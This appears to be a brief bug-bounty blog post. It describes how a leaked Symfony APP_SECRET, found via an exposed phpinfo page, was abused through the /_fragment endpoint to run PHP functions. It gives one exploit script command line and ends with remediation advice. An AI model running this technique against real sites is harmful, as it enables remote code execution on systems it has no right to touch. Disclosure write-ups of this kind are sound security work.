From phpinfo page to many P1 bugs and RCE. [Symfony]

Story:-

Sensitive data leakage
Triaged as P1 bug
app_secret token is leakage

How can use this secret token:-

Coding python time
python3 exploit.py ‘http://sub.website.com/_fragment' — method 1 — secret ‘<seceret>’ — algo ‘sha256’ — internal-url ‘http://sub.website.com/_fragment' — function phpinfo — parameters what:-1

phpinfo function execute

phpcredits function execute

Remediation

  • Disable ESI (Edge-Side Includes) and to change the Symfony’s application secret (APP_SECRET)
  • Disable phpinfo file

Today’s Tips

Links

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store